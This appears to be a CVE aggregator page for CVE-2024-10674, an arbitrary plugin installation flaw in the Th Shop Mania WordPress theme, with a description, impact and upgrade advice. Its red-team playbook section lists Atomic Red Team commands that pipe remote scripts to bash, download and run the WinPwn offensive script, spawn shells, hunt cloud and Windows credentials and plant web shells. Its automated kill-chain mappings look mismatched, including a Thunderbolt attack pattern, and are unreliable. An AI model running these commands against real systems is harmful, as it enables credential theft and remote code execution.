CVE-2024-10674
Overview
The vulnerability is an authorization bypass due to a missing capability check in the th_shop_mania_install_and_activate_callback() function within the Th Shop Mania WordPress theme. This flaw affects the plugin installation mechanism by allowing users with insufficient privileges to invoke plugin installation routines. The affected component is the notification handling code in versions up to and including 1.4.9, where the function fails to verify user capabilities before executing plugin installation and activation processes.
Vulnerability Description
The Th Shop Mania theme for WordPress is vulnerable to unauthorized arbitrary plugin installation due to a missing capability check on the th_shop_mania_install_and_activate_callback() function in all versions up to, and including, 1.4.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install arbitrary plugins which can be leveraged to exploit other vulnerabilities and achieve remote code execution and privilege escalation.
Impact
An attacker with authenticated Subscriber-level access can exploit this vulnerability to install arbitrary plugins, potentially leading to remote code execution and privilege escalation within the WordPress environment. This enables lateral movement and full site compromise. The attack requires valid authentication but no user interaction beyond that, as indicated by CVSS vector AV:N/AC:L/PR:L/UI:N, reflecting network attack complexity with low privileges and no user interaction.
Solution
Upgrade the Th Shop Mania theme to a version later than 1.4.9 where the missing capability check in th_shop_mania_install_and_activate_callback() is implemented. Refer to the Wordfence advisory at https://www.wordfence.com/threat-intel/vulnerabilities/id/b7832d37-19a9-491b-879e-4a22f2ba46ec for detailed patch instructions and confirmation of fixed versions. No workaround is documented; applying the vendor-provided patch or updating the theme is required.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Th Shop Mania theme for WordPress arises from a critical oversight in the implementation of capability checks within the th_shop_mania_install_and_activate_callback() function. This flaw allows authenticated users, even those with minimal privileges such as Subscriber-level access, to install arbitrary plugins without proper authorization. The absence of a robust capability verification mechanism means that once an attacker gains access to a user account with the requisite privileges, they can exploit this vulnerability to introduce malicious plugins into the WordPress environment. This can lead to a cascade of security issues, including remote code execution and privilege escalation, as the installed plugins may contain harmful code that can manipulate the website's functionality or compromise sensitive data.
Attack vectors for exploiting this vulnerability are particularly concerning due to the low barrier to entry for potential attackers. An authenticated user, such as a Subscriber, can leverage this flaw to install plugins that are not only unauthorized but also potentially harmful. For instance, an attacker could install a plugin designed to create backdoors, allowing them to maintain persistent access to the site. Additionally, they could introduce plugins that exploit other vulnerabilities within the WordPress ecosystem or the underlying server infrastructure, leading to further compromises. The exploitation scenarios are varied; an attacker could use social engineering techniques to gain access to a legitimate user account or exploit weak password policies to facilitate unauthorized access.
The real-world impact of this vulnerability is significant, particularly for businesses relying on WordPress for their online presence. The ability for an attacker to install arbitrary plugins can lead to severe operational disruptions, data breaches, and loss of customer trust. For e-commerce sites, the implications can be even more dire, as compromised systems may expose sensitive customer information, leading to regulatory fines and reputational damage. Furthermore, the potential for remote code execution means that attackers could take complete control of the affected systems, leading to extensive financial losses and operational downtime. The high CVSS score of 8.8 reflects the severity of the risk, indicating that organizations must prioritize addressing this vulnerability to safeguard their assets.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, regular security audits and code reviews of themes and plugins should be conducted to identify and rectify any capability check deficiencies. Additionally, organizations should enforce strict user role management, ensuring that only trusted users are granted higher-level access rights. Employing security plugins that monitor changes to the WordPress environment can also help detect unauthorized plugin installations. Furthermore, organizations should maintain updated backups and have an incident response plan in place to quickly address any potential exploitation of this vulnerability. By adopting these strategies, businesses can significantly reduce their risk exposure and enhance their overall security posture against this and similar vulnerabilities.
In conclusion, the vulnerability within the Th Shop Mania theme represents a critical threat to WordPress installations, particularly due to its potential for exploitation by low-privileged authenticated users. The implications for businesses are profound, ranging from operational disruptions to severe reputational damage. As the threat landscape continues to evolve, proactive measures in detection and mitigation are essential to protect against such vulnerabilities, ensuring the integrity and security of web applications in the WordPress ecosystem.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
GitHub PoCs (2)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
PoC
|
- | 0 | 0 | - | View |
|
Nxploited/CVE-2024-10674
Th Shop Mania <= 1.4.9 - Authenticated (Subscriber+) Arbitrary Plugin Installation/Activation
|
Nxploited | 0 | 0 | 2025-03-12 | View |
Threat Feed
1 eventsProof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
50%
|
Low | Very High |
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (5)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-10674 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/b7832d37-19a9-491b-879e-4a22f2ba46ec?source=cve |
| themes.svn.wordpress.org |
GitHub CVE
|
https://themes.svn.wordpress.org/th-shop-mania/1.4.9/lib/notification/notify.php |
| themes.trac.wordpress.org |
GitHub CVE
|
https://themes.trac.wordpress.org/browser/th-shop-mania/1.4.9/lib/notification/notify.php |
| themes.trac.wordpress.org |
GitHub CVE
|
https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=247810%40th-shop-mania&new=247810%40th-shop-mania&sfp_email=&sfph_mail= |